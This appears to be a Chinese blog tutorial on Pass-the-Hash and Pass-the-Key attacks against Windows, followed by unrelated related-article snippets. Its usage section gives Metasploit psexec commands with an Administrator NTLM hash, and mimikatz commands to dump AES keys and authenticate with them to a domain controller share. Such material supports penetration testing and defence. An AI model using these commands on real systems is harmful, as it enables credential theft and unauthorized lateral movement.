Pass The Hash(Key) 憑據傳遞攻擊

阿新 • • 發佈：2020-07-22

Pass The Hash(Key) 憑據傳遞攻擊

原理

由於在進行認證的時候，是用使用者hash加密時間戳，即使在使用密碼進行登入的情況下，也是先把密碼加密成hash，再進行認證。因此在只有使用者hash，沒有明文密碼的情況下也是可以進行認證的。不管是rubeus還是impacket裡面的相關指令碼都是支援直接使用hash進行認證。其中，如果hash的ntlm hash，然後加密方式是rc4，這種就算做是pass the hash，如果是hash是aes key(使用sekurlsa::ekeys匯出來)，就算是pass the key。在很多地方，不支援rc4加密方式的時候，使用pass the key不失為一種好方法。

利用方法

msf

use exploit/windows/smb/psexec_psh 
msf5 exploit(windows/smb/psexec_psh) > set rhosts 192.168.1.107
msf5 exploit(windows/smb/psexec_psh) > set smbuser Administrator
exploit(windows/smb/psexec_psh) > set smbpass 31d6cfe0d16ae931b73c59d7e0c089c0:249dbaafa8643e3d2f7c692761ba83e7

或者

use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.1.107
msf5 exploit(windows/smb/psexec) > set smbpass 31d6cfe0d16ae931b73c59d7e0c089c0:249dbaafa8643e3d2f7c692761ba83e7
msf5 exploit(windows/smb/psexec) > set smbuser Administrator
msf5 exploit(windows/smb/psexec) > run

mimikatz

privilege::debug
sekurlsa::pth /user:使用者名稱 /domain:域名 /ntlm:NTLMHash

pass the key

//使用mimikatz抓取AES-256金鑰
privilege::debug
sekurlsa::ekeys
//匯入
privilege::debug
sekurlsa::pth /user:使用者名稱 /domain:域名 /aes256:AES256金鑰
//檢視DC的共享資料夾
dir \\dc\c$

Pass The Hash(Key) 憑據傳遞攻擊

Pass The Hash(Key) 憑據傳遞攻擊原理由於在進行認證的時候，是用使用者hash加密時間戳，即使在使用密碼進行登入的情況下，也是先把密碼加密成hash，再進行認證。因此在只有使用者hash，沒有明文密碼的情況下也是可

Pass-The-Hash(Key)

雜湊傳遞攻擊利用(Pass The Hash)

最近又複習了一下內網的相關知識，把以前的整理了一下發出來做個記錄。 0x01 雜湊傳遞攻擊概念

NTLM協議與Pass the Hash的愛情

0x01、前言 NTLM使用在Windows NT和Windows 2000 Server或者之後的工作組環境中（Kerberos用在域模式下）。在AD域環境中，如果需要認證Windows NT系統，也必須採用NTLM。較之Kerberos，基於NTLM的認證過程要簡單很多

解決GPG error: The following signatures couldn‘t be verified because the public key is not available

技術標籤：問題解決方法原文：https://blog.csdn.net/zhuiqiuzhuoyue583/article/details/90597499

Java高階之1.7版本JDK中的HashMap的hash(key)方法

技術標籤：Java 在說hash(key)方法之前，下面來簡單模擬下HashMap中的put()方法，來檢視雜湊衝突：

心理恐怖遊戲《The Tartarus Key》上架Steam

心理恐怖遊戲《The Tartarus Key》現已上架Steam商店，暫時不支援中文，本作將於年內發售。

openssl - generate a private key and extract the public key from it

Generating Your Private Key After deciding on a key algorithm, key size, and whether to use a passphrase, you are ready to generate your private key.

Does RSA Private key always contain the Public key, or is it just .NET?

Does RSA Private key always contain the Public key, or is it just .NET? 回答1 The private key always includes the public key.

How To Convert A CER Certificate To PFX Without The Private Key

Import the certificate to its personal certificate store Right-clickon the certificate file.Selectinstall certificate.

Jenkins 使用SSH Username with private key憑據從Azure DevOps Git拉取程式碼的設定

使用 SSH 金鑰身份驗證查閱上文，步驟 1：建立 SSH 金鑰 & 步驟 2：將公鑰新增到 Azure DevOps Services/TFS

如何對Windows系統進行雜湊傳遞***（Pass-Hash-Attack）

『面向物件』本篇博文主要面向資訊保安***測試初級人員以及資訊保安***技術愛好者。

2020杭電HDU多校第二場The Oculus（假斐波那契數列真Hash）

Problem Description Let\'s define the Fibonacci sequence \\(F_1,F_2,… as F_1=1,F_2=2,F_i=F_{i−1}+F_{i−2}\\) (i≥3).

HDU6768 The Oculus（Hash）

Let\'s define the Fibonacci sequence \\(F_1,F_2,\\dots\\) as \\(F_1=1,F_2=2,F_i=F_{i-1}+F_{i-2}\\) (\\(i\\geq 3\\)).

攻防世界-Get-the-key.txt

首先把附件下載下來，看題目的意思，我以為會是直接修改後綴把字尾改為.txt後，開啟會有很多亂碼，但是可以看到裡面有很多的.txt檔名猜測是一個壓縮包檔案謹慎起見還是四處看了看在刪除.txt字尾的先放

封神臺靶場：第七章：GET THE PASS！【技能點：程序中抓下管理員明文密碼】

拿到SYSTEM之後，尤里並不滿足，他準備通過某種方式拿到伺服器管理員密碼，用來收集密碼資訊，以便其他方向的滲透，順便想將密碼發給小芳，用以炫技。卻不曾想，當尤里看到系統的明文密碼後。。大吃一驚。。。自此，

通過反射獲取傳遞的物件的屬性及值（key-＞value）

技術標籤：反射java 實體類自定義我的實體類Student中有一下私有屬性 private Integer Id;

攻防世界_MISC進階區_Get-the-key.txt(詳細)

攻防世界MISC進階之Get-the-key.txt 啥話也不說，咱們直接看題吧！首先下載附件看到一個壓縮包：

Ruby 對 Hash 按 key 進行排序

技術標籤：Rubyhash排序當然，Ruby 中的Hash 和集合 Set 類似，都是沒有所謂順序的，預設是按照資料插入的先後順序來排列的。但是你肯定有過這樣的需求：怎麼讓 Ruby 中的 Hash 按照鍵的順序重新排列得到新的 H

F. The Number of Subpermutations 題解(異或hash維護全排列)

題目連結題目思路這種有關全排列的問題大多都是異或字首和求解所以我們可以列舉 1的位置。每次向左/右搜，往一個方向搜的時候記錄掃到的最大值，當作排列的長度（最大

Pass The Hash(Key) 憑據傳遞攻擊

Pass The Hash(Key) 憑據傳遞攻擊

原理

利用方法

msf

mimikatz

pass the key

相關推薦